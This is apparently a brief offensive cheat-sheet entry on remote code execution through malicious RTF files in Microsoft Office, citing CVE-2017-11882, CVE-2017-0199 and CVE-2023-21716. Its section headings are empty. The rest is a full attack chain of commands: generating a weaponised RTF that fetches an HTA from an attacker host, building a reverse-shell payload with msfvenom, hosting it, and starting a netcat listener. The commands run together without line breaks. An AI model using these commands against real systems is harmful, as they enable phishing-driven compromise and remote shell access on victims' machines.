MS Office - RTF Files RCE
Theory
Practice
CVE-2017-11882
python2.7 cve-2017-0199_toolkit.py -M gen -w bad.rtf -u http://<ATTACKING_IP>/bad.hta -t RTF -x 0msfvenom -p windows/shell/reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> -f hta-psh -o bad.hta#Start the webserver to host the bad.hta file
python3 -m http.server 80
#Start listener
rlwrap nc -lvnp <ATTACKING_PORT>CVE-2023-21716
Last updated